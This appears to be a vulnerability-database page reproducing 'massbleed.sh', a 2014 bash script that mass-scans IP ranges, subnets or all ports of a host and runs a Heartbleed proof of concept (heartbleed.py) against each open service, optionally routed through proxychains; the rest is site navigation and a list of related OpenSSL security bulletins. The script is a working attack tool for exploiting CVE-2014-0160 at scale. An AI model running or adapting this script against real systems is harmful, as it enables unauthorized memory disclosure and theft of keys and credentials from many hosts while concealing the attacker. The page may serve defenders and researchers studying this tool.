Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mass Bleed 20140423

🗓️ 23 Apr 2014 00:00:00Reported by 1N3Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 53 Views

Mass Bleed 20140423 by 1N3 is a bash script designed to scan for the Heartbleed vulnerability in OpenSSL. It can scan CIDR ranges, individual ports, and subnets, and supports proxy scanning. The script checks for the presence of heartbleed.py, unicornscan, and nmap as prerequisites

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: Tivoli Storage Productivity Center is affected by vulnerabilities in OpenSSL (CVE-2014-0160 and CVE-2014-0076)
19 Aug 202223:26
ibm
IBM Security Bulletins		Security Bulletin: TS3000(TSSC) is affected by a vulnerability in OpenSSL (CVE-2014-0160)
26 Sep 202204:23
ibm
IBM Security Bulletins		Security Bulletins for IBM Tealeaf Customer Experience offerings
16 Jun 201819:35
ibm
IBM Security Bulletins		Security Bulletin: Flex System Integrated Management Module 2 (IMM2) is affected by vulnerabilities in OpenSSL (CVE-2014-0160 and CVE-2014-0076)
30 Jan 201908:35
ibm
IBM Security Bulletins		Security Bulletin: IBM Worklight is affected by a vulnerability in OpenSSL (CVE-2014-0160)
17 Jun 201822:31
ibm
IBM Security Bulletins		Security Bulletin: Rational Build Forge is affected by vulnerabilities in OpenSSL (CVE-2014-0160 and CVE-2014-0076)
17 Jun 201804:53
ibm
IBM Security Bulletins		Security Bulletin: IBM Systems Director (ISD) is affected by vulnerabilities in OpenSSL (CVE-2013-4353, CVE-2013-6450, and CVE-2013-6449)
30 Jan 201908:35
ibm
IBM Security Bulletins		Security Bulletin: SAN Volume Controller and Storwize Family systems are affected by vulnerabilities in OpenSSL (CVE-2014-0160 and CVE-2014-0076)
29 Mar 202301:48
ibm
IBM Security Bulletins		Security Bulletin: Multiple vulnerabilities in IBM MessageSight (CVE-2014-0921, CVE-2014-0922, CVE-2014-0923, CVE-2014-0924)
17 Jun 201815:12
ibm
IBM Security Bulletins		Security Bulletin: Some versions of IBM Security Access Manager for Web are affected by the Heartbleed vulnerability (CVE-2014-0160)
16 Jun 201821:17
ibm
Rows per page
`#!/bin/bash  
# massbleed.sh 20140423 by 1N3  
# http://treadstonesecurity.blogspot.ca  
# Usage: sh massbleed.sh <CIDR|IP> <single|port|subnet> [port] [proxy]  
#   
# This script has four main functions with the ability to proxy all connections:  
# 1. To mass scan any CIDR range for HeartBleed via port 443/tcp (https) (example: sh massbleed.sh 192.168.0.0/16)  
# 2. To scan any CIDR range for HeartBleed via any custom port specified (example: sh massbleed.sh 192.168.0.0/16 port 8443)  
# 3. To individual scan every port (1-10000) on a single system for vulnerable versions of OpenSSL (example: sh massbleed.sh 127.0.0.1 single)  
# 4. To scan every open port on every host in a single class C subnet for HeartBleed (example: sh massbleed.sh 192.168.0. subnet)  
#  
# PROXY: A proxy option has been added to scan and run the scan via proxychains. You'll need to configure /etc/proxychains.conf for this to work.   
# USAGE EXAMPLES:  
# (example: sh massbleed.sh 192.168.0.0/16 0 0 proxy)  
# (example: sh massbleed.sh 192.168.0.0/16 port 8443 proxy)  
# (example: sh massbleed.sh 127.0.0.1 single 0 proxy)  
# (example: sh massbleed.sh 192.168.0. subnet 0 proxy)  
#  
# Prerequisites:  
# Is the heartbleed POC present?   
# Is unicornscan installed?  
# Is nmap installed?  
  
echo "(--==== http://treadstonesecurity.blogspot.ca"  
echo "(--==== massbleed.sh 20140423 by 1N3"  
echo ""  
  
HEARTBLEED=`ls heartbleed.py`  
UNICORNSCAN=`which unicornscan`  
NMAP=`which nmap`  
RANGE=$1  
ALL_PORTS=$2  
CUSTOM_PORT=$3  
PROXY=$4  
PORT_RANGE="1-65000"  
  
if [ "$HEARTBLEED" != "heartbleed.py" ]; then  
echo "(--==== heartbleed.py not found!"  
echo "(--==== To fix, download the POC by Jared Stafford and place in same directory named: heartbleed.py"  
exit  
fi  
  
if [ "$UNICORNSCAN" == "" ]; then  
echo "(--==== unicornscan not installed! Exiting..."  
exit  
fi  
  
if [ "$NMAP" == "" ]; then  
echo "(--==== nmap not installed! Exiting..."  
exit  
fi  
  
if [ -z "$1" ]; then  
echo "(--==== usage: $0 <CIDR|IP> <single|port|subnet> [port] [proxy]"  
exit  
fi  
  
if [ "$PROXY" = "proxy" ]; then  
echo "(--==== scanning via proxy..."  
if [ "$ALL_PORTS" = "single" ]; then  
if [ "$CUSTOM_PORT" != "0" ]; then  
echo "(--==== Checking $RANGE:$CUSTOM_PORT" && proxychains python heartbleed.py $RANGE -p $CUSTOM_PORT | grep Server 2> /dev/null  
else  
for a in `proxychains unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;   
do echo "(--==== Checking $RANGE:"$a && proxychains python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;   
done;  
fi  
fi  
if [ "$ALL_PORTS" = "subnet" ]; then  
for a in {1..254};   
do   
echo "Scanning: $RANGE$a"  
for b in `proxychains unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;  
do   
echo "$RANGE$a:$b"  
proxychains python heartbleed.py $RANGE$a -p $b | grep Server;  
done;  
done;  
fi  
if [ "$ALL_PORTS" = "port" ]; then  
for a in `proxychains unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;   
do echo "(--==== Checking:" $a:$CUSTOM_PORT&& proxychains python heartbleed.py $a -p $CUSTOM_PORT | grep Server;   
done;  
else   
for a in `proxychains unicornscan $RANGE -p 443 | awk '{print $6}'`;   
do echo "(--==== Checking:" $a && proxychains python heartbleed.py $a -p 443 | grep Server;   
done  
fi  
else   
if [ "$ALL_PORTS" = "single" ]; then  
for a in `unicornscan $RANGE -p $PORT_RANGE | awk '{print $4}' | cut -d']' -f1`;   
do echo "(--==== Checking $RANGE:"$a && python heartbleed.py $RANGE -p $a | grep Server 2>/dev/null;   
done;  
fi  
if [ "$ALL_PORTS" = "subnet" ]; then  
for a in {1..254};   
do   
echo "Scanning: $RANGE$a"  
for b in `unicornscan "$RANGE$a" -mT -r500 | awk '{print $4}' | cut -d']' -f1`;  
do   
echo "$RANGE$a:$b"  
python heartbleed.py $RANGE$a -p $b | grep Server;  
done;  
done;  
fi  
if [ "$ALL_PORTS" = "port" ]; then  
for a in `unicornscan $RANGE -p $CUSTOM_PORT | awk '{print $6}'`;   
do echo "(--==== Checking:" $a:$CUSTOM_PORT&& python heartbleed.py $a -p $CUSTOM_PORT | grep Server;   
done;  
else   
for a in `unicornscan $RANGE -p 443 | awk '{print $6}'`;   
do echo "(--==== Checking:" $a && python heartbleed.py $a -p 443 | grep Server;   
done  
fi  
fi  
  
echo "(--==== scan complete!"  
exit   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Apr 2014 00:00Current
8.2High risk
Vulners AI Score8.2
EPSS0.94464
mass bleed 20140423bash scriptheartbleed vulnerabilityopensslcidr rangeindividual portsubnetproxy scanningprerequisitesheartbleed.pyunicornscannmap
53